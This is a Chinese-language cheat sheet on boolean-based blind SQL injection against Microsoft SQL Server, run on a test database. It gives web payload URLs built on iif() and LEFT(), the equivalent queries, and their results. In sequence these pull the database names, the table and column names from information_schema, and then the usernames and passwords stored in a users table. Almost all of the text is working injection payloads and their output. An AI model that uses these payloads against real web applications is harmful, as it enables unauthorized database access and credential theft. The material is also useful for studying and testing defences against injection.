0x00 记忆方式
and iif(判断条件 ,1,0);
正确时会和原来的数据一致,错误会不返回数据
0x01 基本数据
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x02 获取数据长度
1> select LEN(system_user);
2> go
+---+
| |
+---+
| 2 |
+---+
(1 rows affected)
0x03 读取当前连接的数据库
web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT(db_name(),1)=’t’,1,0)
数据库语句: select * from _article _where id =1 and 1=iif(LEFT(db_name(),1)=’t’,1,0)
# 获取当前数据库第一个字符
# 对得情况
1> select * from article where id=1 and 1=iif(LEFT(db_name(),1)='t',1,0);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# 错得情况
1> select * from article where id=1 and 1=iif(LEFT(db_name(),1)='aaaa',1,0);
2> go
+----+-----+--------+
| id | title | content |
+----+-----+--------+
+----+-----+--------+
(0 rows affected)
# 获取当前数据库第二个字符
# 对得情况
1> select * from article where id=1 and 1=iif(LEFT(db_name(),2)='te',1,0);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
0x04 猜库名
注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库
web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT(db_name(1),1)=’m’,1,0)
数据库语句: select * from article where id=1 and 1=iif(LEFT(db_name(1),1)=’m’,1,0)
# 获取 1库第一个字符
# 对得情况
1> select * from article where id=1 and 1=iif(LEFT(db_name(1),1)='m',1,0);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# 获取 1库第一个字符
# 对得情况
1> select * from article where id=1 and 1=iif(LEFT(db_name(1),2)='ma',1,0)
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
0x05 猜表名
注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段
修改 LEFT() 函数 第二个参数可以控制出来得数据
查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1),1)=’a’,1,0)
数据库语句: select * from article where id=1 and 1=iif(LEFT((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1),1)=’a’,1,0)
# 获取 当前库 1表得第一个字符
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
table_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 1
),
1
) = 'a',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# 获取 当前库 1表得第二个字符
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
table_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
table_name
FROM
information_schema.tables
WHERE
table_catalog = db_name()
) AS a
WHERE
row_number = 1
),
2
) = 'ar',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
0x06 猜字段
注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段
查询不同的表可以这样
例如:
table_name=’要查询的表名’
查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1),1)=’i’,1,0)
数据库语句: select * from article where id=1 and 1=iif(LEFT((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1),1)=’i’,1,0)
# 获取当前库 users表 第一个字段第一个字符
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
column_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 1
),
1
) = 'i',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# 获取当前库 users表 第一个字段第二个字符
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
column_name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
column_name
FROM
information_schema.columns
WHERE
table_catalog = db_name()
AND table_name = 'users'
) AS a
WHERE
row_number = 1
),
2
) = 'id',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
0x07 猜内容
注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
获取不同得字段数据可以修改 web语句里面得 a.username
例如
user表字段数据为:id, username,password
因为我使用了别名,所以如果想要获取其他得数据可以改成
a.id,a.username,a.password
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1),1)=’t’,1,0)
数据库语句: select from article where id=1 and 1=iif(LEFT((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1),1)=’t’,1,0)
# 查询users表 第一条数据, username 字段 前9个字符
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
a.username
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 1
),
9
) = 'test-user',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)
# 查询users表 第二条数据, password 字段 前6个字符
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = iif (
LEFT (
(
SELECT
a.password
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY password) AS row_number ,*
FROM
users
) AS a
WHERE
row_number = 2
),
6
) = '234567',
1,
0
);
2> go
+----+----------+----------+
| id | title | content |
+----+----------+----------+
| 1 | 测试标题 | 测试内容 |
+----+----------+----------+
(1 rows affected)